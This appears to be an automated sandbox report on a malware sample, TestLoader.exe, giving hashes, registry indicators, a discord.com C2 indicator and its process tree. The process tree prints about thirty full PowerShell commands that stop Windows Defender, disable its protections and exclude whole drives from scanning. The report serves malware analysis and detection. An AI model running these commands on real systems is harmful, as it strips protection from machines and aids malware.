Analysis
-
max time kernel
64s -
max time network
70s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
07-02-2025 23:21
Static task
static1
Behavioral task
behavioral1
Sample
TestLoader.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
TestLoader.exe
Resource
win10v2004-20250207-en
General
-
Target
TestLoader.exe
-
Size
181KB
-
MD5
3a58bbafb76707b770bfd32b71dec1ea
-
SHA1
782127a6ee74082671963b26dcfb95ae0cc3b218
-
SHA256
7eb139dfd20e9e10a245d1dee02efd7d109bf84578dc200af354fed8ad4752dc
-
SHA512
ea168fa4318dcea0077462f7cb4c4907e7857d17f4b01b76c96633da1a89ea05b65f4e87cf18b7c2c88eb2801a769a27cbabab3c531b6aedbcaac322ab9c401a
-
SSDEEP
3072:wHfBELxl/i6/hkRZltsKuNCjQutKbtVK6bpfSJYacv:w5ELxla6GbWUq8Y
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TestLoader.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TestLoader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TestLoader.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TestLoader.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TestLoader.exe -
Windows security bypass 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths TestLoader.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 60 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1804 powershell.exe 1296 powershell.exe 2444 powershell.exe 592 powershell.exe 1948 powershell.exe 2540 powershell.exe 2564 powershell.exe 672 powershell.exe 2176 powershell.exe 3004 powershell.exe 956 powershell.exe 1916 powershell.exe 2748 powershell.exe 3004 powershell.exe 2756 powershell.exe 1696 powershell.exe 2508 powershell.exe 1804 powershell.exe 2028 powershell.exe 2988 powershell.exe 2372 powershell.exe 2952 powershell.exe 1296 powershell.exe 2252 powershell.exe 2168 powershell.exe 2836 powershell.exe 3012 powershell.exe 812 powershell.exe 2288 powershell.exe 2136 powershell.exe 2096 powershell.exe 776 powershell.exe 1948 powershell.exe 2540 powershell.exe 1676 powershell.exe 672 powershell.exe 956 powershell.exe 1060 powershell.exe 2064 powershell.exe 2872 powershell.exe 1928 powershell.exe 2992 powershell.exe 2564 powershell.exe 924 powershell.exe 2176 powershell.exe 1652 powershell.exe 1752 powershell.exe 2408 powershell.exe 592 powershell.exe 2780 powershell.exe 2712 powershell.exe 2036 powershell.exe 2948 powershell.exe 1568 powershell.exe 2680 powershell.exe 1916 powershell.exe 2684 powershell.exe 2444 powershell.exe 1072 powershell.exe 392 powershell.exe -
Windows security modification 2 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection TestLoader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths TestLoader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions TestLoader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications TestLoader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard TestLoader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features TestLoader.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 discord.com 3 discord.com -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 TestLoader.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e TestLoader.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e TestLoader.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 2684 powershell.exe 2836 powershell.exe 3012 powershell.exe 2064 powershell.exe 2176 powershell.exe 3004 powershell.exe 2444 powershell.exe 592 powershell.exe 1948 powershell.exe 2540 powershell.exe 1072 powershell.exe 812 powershell.exe 1652 powershell.exe 2036 powershell.exe 1752 powershell.exe 2948 powershell.exe 1568 powershell.exe 2872 powershell.exe 2680 powershell.exe 1928 powershell.exe 1676 powershell.exe 2136 powershell.exe 2372 powershell.exe 2952 powershell.exe 2756 powershell.exe 2992 powershell.exe 2564 powershell.exe 1804 powershell.exe 672 powershell.exe 956 powershell.exe 1296 powershell.exe 1916 powershell.exe 2028 powershell.exe 2096 powershell.exe 2780 powershell.exe 1060 powershell.exe 2252 powershell.exe 392 powershell.exe 2712 powershell.exe 1696 powershell.exe 2168 powershell.exe 2748 powershell.exe 2988 powershell.exe 2288 powershell.exe 2408 powershell.exe 924 powershell.exe 2508 powershell.exe 776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeDebugPrivilege 2804 TestLoader.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeBackupPrivilege 2804 TestLoader.exe Token: SeRestorePrivilege 2804 TestLoader.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 592 powershell.exe Token: SeDebugPrivilege 1948 powershell.exe Token: SeDebugPrivilege 2540 powershell.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 812 powershell.exe Token: SeDebugPrivilege 1652 powershell.exe Token: SeDebugPrivilege 2036 powershell.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 1568 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeDebugPrivilege 2992 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 672 powershell.exe Token: SeDebugPrivilege 956 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1916 powershell.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 1060 powershell.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 392 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2988 powershell.exe Token: SeDebugPrivilege 2288 powershell.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 924 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 776 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2804 wrote to memory of 2684 2804 TestLoader.exe 30 PID 2804 wrote to memory of 2684 2804 TestLoader.exe 30 PID 2804 wrote to memory of 2684 2804 TestLoader.exe 30 PID 2804 wrote to memory of 2836 2804 TestLoader.exe 33 PID 2804 wrote to memory of 2836 2804 TestLoader.exe 33 PID 2804 wrote to memory of 2836 2804 TestLoader.exe 33 PID 2804 wrote to memory of 3012 2804 TestLoader.exe 35 PID 2804 wrote to memory of 3012 2804 TestLoader.exe 35 PID 2804 wrote to memory of 3012 2804 TestLoader.exe 35 PID 2804 wrote to memory of 2064 2804 TestLoader.exe 37 PID 2804 wrote to memory of 2064 2804 TestLoader.exe 37 PID 2804 wrote to memory of 2064 2804 TestLoader.exe 37 PID 2804 wrote to memory of 2176 2804 TestLoader.exe 39 PID 2804 wrote to memory of 2176 2804 TestLoader.exe 39 PID 2804 wrote to memory of 2176 2804 TestLoader.exe 39 PID 2804 wrote to memory of 3004 2804 TestLoader.exe 41 PID 2804 wrote to memory of 3004 2804 TestLoader.exe 41 PID 2804 wrote to memory of 3004 2804 TestLoader.exe 41 PID 2804 wrote to memory of 2444 2804 TestLoader.exe 43 PID 2804 wrote to memory of 2444 2804 TestLoader.exe 43 PID 2804 wrote to memory of 2444 2804 TestLoader.exe 43 PID 2804 wrote to memory of 592 2804 TestLoader.exe 45 PID 2804 wrote to memory of 592 2804 TestLoader.exe 45 PID 2804 wrote to memory of 592 2804 TestLoader.exe 45 PID 2804 wrote to memory of 1948 2804 TestLoader.exe 47 PID 2804 wrote to memory of 1948 2804 TestLoader.exe 47 PID 2804 wrote to memory of 1948 2804 TestLoader.exe 47 PID 2804 wrote to memory of 2540 2804 TestLoader.exe 49 PID 2804 wrote to memory of 2540 2804 TestLoader.exe 49 PID 2804 wrote to memory of 2540 2804 TestLoader.exe 49 PID 2804 wrote to memory of 1072 2804 TestLoader.exe 51 PID 2804 wrote to memory of 1072 2804 TestLoader.exe 51 PID 2804 wrote to memory of 1072 2804 TestLoader.exe 51 PID 2804 wrote to memory of 812 2804 TestLoader.exe 53 PID 2804 wrote to memory of 812 2804 TestLoader.exe 53 PID 2804 wrote to memory of 812 2804 TestLoader.exe 53 PID 2804 wrote to memory of 1652 2804 TestLoader.exe 55 PID 2804 wrote to memory of 1652 2804 TestLoader.exe 55 PID 2804 wrote to memory of 1652 2804 TestLoader.exe 55 PID 2804 wrote to memory of 2036 2804 TestLoader.exe 57 PID 2804 wrote to memory of 2036 2804 TestLoader.exe 57 PID 2804 wrote to memory of 2036 2804 TestLoader.exe 57 PID 2804 wrote to memory of 1752 2804 TestLoader.exe 59 PID 2804 wrote to memory of 1752 2804 TestLoader.exe 59 PID 2804 wrote to memory of 1752 2804 TestLoader.exe 59 PID 2804 wrote to memory of 2948 2804 TestLoader.exe 61 PID 2804 wrote to memory of 2948 2804 TestLoader.exe 61 PID 2804 wrote to memory of 2948 2804 TestLoader.exe 61 PID 2804 wrote to memory of 1568 2804 TestLoader.exe 63 PID 2804 wrote to memory of 1568 2804 TestLoader.exe 63 PID 2804 wrote to memory of 1568 2804 TestLoader.exe 63 PID 2804 wrote to memory of 2872 2804 TestLoader.exe 65 PID 2804 wrote to memory of 2872 2804 TestLoader.exe 65 PID 2804 wrote to memory of 2872 2804 TestLoader.exe 65 PID 2804 wrote to memory of 2680 2804 TestLoader.exe 67 PID 2804 wrote to memory of 2680 2804 TestLoader.exe 67 PID 2804 wrote to memory of 2680 2804 TestLoader.exe 67 PID 2804 wrote to memory of 1928 2804 TestLoader.exe 69 PID 2804 wrote to memory of 1928 2804 TestLoader.exe 69 PID 2804 wrote to memory of 1928 2804 TestLoader.exe 69 PID 2804 wrote to memory of 1676 2804 TestLoader.exe 71 PID 2804 wrote to memory of 1676 2804 TestLoader.exe 71 PID 2804 wrote to memory of 1676 2804 TestLoader.exe 71 PID 2804 wrote to memory of 2136 2804 TestLoader.exe 73
Processes
-
C:\Users\Admin\AppData\Local\Temp\TestLoader.exe"C:\Users\Admin\AppData\Local\Temp\TestLoader.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Windows security bypass
- Windows security modification
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Stop-Service WinDefend -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-Service WinDefend -StartupType Disabled" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend' -Name 'Start' -Value 4 -PropertyType DWord -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Windows' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\SkillProtect' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableBehaviorMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableBlockAtFirstSeen $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableIOAVProtection $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisablePrivacyMode $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableArchiveScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableScriptScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -SubmitSamplesConsent 2 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -MAPSReporting 0 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -HighThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -LowThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -SevereThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -EnableControlledFolderAccess Disabled -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Windows' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\SkillProtect' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
